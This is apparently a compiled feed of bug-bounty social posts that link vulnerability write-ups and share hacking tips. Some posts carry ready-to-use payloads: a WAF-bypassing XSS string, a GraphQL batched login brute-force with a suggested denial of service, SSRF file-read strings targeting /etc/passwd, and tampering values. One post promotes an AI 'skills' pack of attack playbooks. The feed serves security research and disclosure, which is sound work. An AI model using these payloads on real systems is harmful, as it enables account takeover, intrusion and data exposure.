lazyhackerbd

The Bug That Almost Wasn’t: How a “Dead End” Led to 500+ Leaked Customer Records by Priyansh @priyanshbhadoria5/the-bug-that-almost-wasnt-how-a-dead-end-led-to-500-leaked-customer-records-18db26e53705" target="_blank" rel="nofollow noopener">medium.com/@priyanshbhado… #bugbounty #bugbountytips #bugbountytip

Authentication Bypass via SQL Injection (Login Endpoint) Summary During a security assessment of the Vulnerable Bank application @Vulnbank, an authentication bypass was identified in the login functionality. The issue allows an attacker to successfully log in as a privileged user without valid credentials due to improper handling of user input at the backend. What Happened The application’s login endpoint accepts user-supplied input for authentication but fails to properly validate or sanitize it before processing. As a result, crafted input is interpreted directly by the backend query logic. This led to a situation where: The application returned a successful login response A valid session token was issued. The user interface reflected authenticated admin access. Sensitive account details (e.g., balance, account number) became accessible. Evidence (Login Response & Dashboard Access) Why This Is a Problem This vulnerability breaks a core security control: authentication. If exploited in a real-world environment, it could allow an attacker to: Impersonate other users (including admins) Access or manipulate financial data Initiate unauthorized transactions Fully compromise trust in the platform From a risk perspective, this is a high-impact issue because it affects confidentiality, integrity, and accountability simultaneously. Root Cause The issue stems from: Improper input handling at the authentication layer. Dynamic query construction without safe parameterization. Lack of defensive controls such as strict validation and prepared statements. In short: user input was trusted when it should never be. How This Should Be Fixed To remediate this issue, the application should implement the following controls: Use parameterized queries / prepared statements Enforce strict server-side input validation Avoid exposing verbose authentication responses Implement secure error handling Add rate limiting and monitoring on authentication endpoints Perform regular code reviews and security testing Key Takeaway Authentication vulnerabilities are not “basic bugs” they are business-critical failures. This issue reinforces a fundamental lesson in security engineering: If authentication fails, everything else fails with it. Secure design at the input and query level is non-negotiable, especially in financial applications. #Pentest #Sqlinjection

Nice Free tool to keep in your bug bounty arsenal: pingback.sh You never know when a forgotten blind XSS payload will suddenly come back with an email notification. 💰🎯 #BugBounty #Bugbountytips #BlindXSS #XSS #SecurityResearch #CyberSecurity #EthicalHacking #AppSec #InfoSec #BugHunter #HackerOne #YesWeHack #Intigriti

فطرت ؟ امسك حلي @0RedX_/mass-assignment-json-validation-bypass-from-zero-access-to-full-admin-takeover-fc478e5a94be" target="_blank" rel="nofollow noopener">medium.com/@0RedX_/mass-a…

Escalating Self-Stored XSS to Complete Admin ATO by Mugh33ra mugh33ra.medium.com/escalating-sel… #bugbounty #bugbountytips #bugbountytip

IDOR via Base64 Encoded ID Allows Unauthorized Deletion of Other Users' Spaces by Omer Mohmed @o.mohmed.ascii/idor-via-base64-encoded-id-allows-unauthorized-deletion-of-other-users-spaces-291be45925b0" target="_blank" rel="nofollow noopener">medium.com/@o.mohmed.asci… #bugbounty #bugbountytips #bugbountytip

Account Takeover: How a Flaw in Password Reset Verification Compromised User Accounts by Atanu Pal @atanupal22256/account-takeover-how-a-flaw-in-password-reset-verification-compromised-user-accounts-c84d08a286af" target="_blank" rel="nofollow noopener">medium.com/@atanupal22256… #bugbounty #bugbountytips #bugbountytip #infosec #AccountTakeover

Just got a reward for a vulnerability submitted on @yeswehack -- Cross-site Scripting (XSS) - Reflected (CWE-79). Waf bypass: <mctx%2FOnCoNtEnTvIsIbIlItYaUtOsTaTeChAnGe%3Dalert%601%61%09STYLE%3Ddisplay%3Ablock%3Bcontent-visibility%3Aauto>

How I Discovered Account Takeover (ATO) via XSS and Open Redirect by Jeetpal2007 jeetpal2007.medium.com/how-i-discover… #bugbounty #bugbountytips #bugbountytip #infosec #AccountTakeover

When testing a GraphQL target, verifying array batching is one of the first checks. ☑️  Here’s a quick process: ➡️ Intercept a single query. {"query": "{ user { id } }"} ➡️ Wrap the JSON object in an array and duplicate the query. [{"query": "{ user { id } }"}, {"query": "{ user { id } }"}] ➡️ If the server returns a JSON array of responses: [{"data":...}, {"data":...}] Batch execution is supported. Now, target high-value mutations like login, submit2FA, passwordReset, or query heavy nested objects to cause an application-level Denial of Service (DoS). Here’s how you format the brute-force payload for a login mutation. You can easily script this to generate a massive array of credentials: [   {"query": "mutation { login(username: \"admin\", password: \"admin123\") { token } }"},   {"query": "mutation { login(username: \"admin\", password: \"password1\") { token } }"},   {"query": "mutation { login(username: \"admin\", password: \"qwerty\") { token } }"} ] Hack GraphQL and catch some P1s. 😎

Organization Takeover via IDOR ($3,700) @xploiterr/from-org-switcher-to-org-takeover-an-idor-story-e8f8a5652cb9" target="_blank" rel="nofollow noopener">medium.com/@xploiterr/fro… #BugBounty

Practical SRC / Crowdsourcing / Bug Bounty Vulnerability Discovery: Claude's Code Skills — 19 attack playbooks, 305 structured payloads, 263 WAF/EDR bypasses, 2887 HackerOne real-world cases, and 88,636 WooYun case statistics. github.com/MyuriKanao/src…

Hacking tip 😎 Don't assume that something is secure just because the feature exists. We saw a bug recently where an application had custom auth. The user entered their password, if it was correct they had to enter a 6 digit code that was sent to their email address. The endpoint had throttling enabled. Most hackers would stop there. This one didn't! They worked out that the password step could be skipped completely, and then they worked out that the throttling on the 2FA endpoint was throttled by IP. They found a full ATO on any account by rotating their IP address on every request and simply brute forcing the 6 digit code. If you're a hacker, don't assume anything!

Quick bug bounty TIPS! ➡️ verified=false → true, “true”, "True", "TRUE", 1, "1", “yes” ➡️ /v3/users/1234 → v1, v0, internal, beta, legacy ➡️ quantity=100 → -1, 0, 9999999999, 1.82376931348623157e+308 ➡️ role=”user” → “admin”, “”, null, “system” ➡️ /admin → /Admin, /ADMIN, /aDmIn Try them now! ✅ Do you have something to add? 👇

SSRF Payloads for LFR/LFD file:/etc//passwd%3F/ file:/etc%252Fpasswd/ file:/etc%252Fpasswd%3F/ file:///etc/%3F/../passwd file:${br}/et${u}c%252Fpas${te}swd%3F/ file:$(br)/et$(u)c%252Fpas$(te)swd%3F/ SSRF POLYGLOT file:///etc/./passwd?/../passwd #CF403 rodoassis.medium.com/on-ssrf-server…

Riley is in the top performing LSRs in the space and I bet you don’t even know about him. he’s the 1% of the 1%. pure unadulterated talent. be like Riley.

Using @hakiraio AI, I was able to earn $15,000 from multiple bug bounty programs. If you want to save time and discover real vulnerabilities in smart contracts and web applications, this tool is built for you.

$500,000 to @rileyholterhus through Cantina Bounties. 🪐 The researchers who consistently find the bugs that matter don't chase volume. They follow programs where scope is tight, triage is fast, and rewards match actual impact. Well done, Riley!

No quotes No spaces No Parentheses No Semicolons Still SQLi.... Collab with @or4nge16hehe @r9.mody/sql-injection-in-numeric-parameter-int-without-common-special-characters-ae31e15ea3e3?postPublishedType=repub" target="_blank" rel="nofollow noopener">medium.com/@r9.mody/sql-i… #bugbounty

Yay, I was awarded a total of $5,500 in bounties on @Hacker0x01! hackerone.com/eliteoffensive Vulnerabilities Found: 1. Privilege Escalation (Trial User → Platform Admin)   1. While reading the site's JavaScript files, I found an API endpoint and noticed it accepted an "author" parameter in the request body.   2. The JS hinted that the "author" value was used to identify who the request belonged to — and that this value needed to be an admin's email for certain actions.   3. I collected 15–20 employee emails through public sources (OSINT).   4. I tested them one by one as the "author" value. One matched a platform admin account, and that request was accepted.   5. Using that admin's email as "author" along with my own account ID, I changed my account "plan" from "trial" to "internal". The request went through, and my role was updated.   6. Root cause: the endpoint was authorizing the request using a value from the request body instead of the role from the user's authenticated session. 2. SSRF → Cloud Metadata Credential Exposure   1. The app had a feature that fetched user-supplied URLs from the server side.   2. Confirmed by pointing it at a public echo service — the response showed a cloud server IP, not mine. The server was making the request.   3. The URL filter blocked the metadata service IP in its standard dotted form, but didn't normalize alternate representations. Converting the same IP to its decimal form bypassed the filter cleanly.   4. From there, the standard two-step metadata flow worked: first request returned a session token, second request used that token to return temporary instance role credentials.   5. Root cause: block-list URL filtering without IP normalization. A single canonicalization step on the resolved address would have caught this. 3. IDOR Exposing 285,000+ Customer Invoices   The invoice download endpoint used sequential IDs with no ownership check. Changing the ID returned other customers' invoices. 4. IDOR Enabling Cross-Tenant Audit Log Manipulation   A "log move" endpoint trusted client-supplied IDs, which allowed moving log entries across tenant boundaries and tampering with audit history. 5. Unauthenticated Path Traversal   A public endpoint accepted file paths without sanitization, allowing partial file reads across the platform with no authentication required. Key lessons: → Never authorize based on request-body fields. Use the session/JWT role. → URL-fetch features need allow-lists, and must normalize alternate IP forms. → Sequential IDs are fine; missing ownership checks are not. → "Unauthenticated" doesn't mean "untrusted input is safe." #bugbounty #securityresearcher #ethicalhacker #cybersecurity #vulnerability #penetrationtesting #securityaudit #digitalsecurity #tech #innovation #hackerone #freelance #freelancer #pentester #ssrf #idor #privilegeescalation #pathtraversal #appsec #infosec #TogetherWeHitHarder #bugbountytips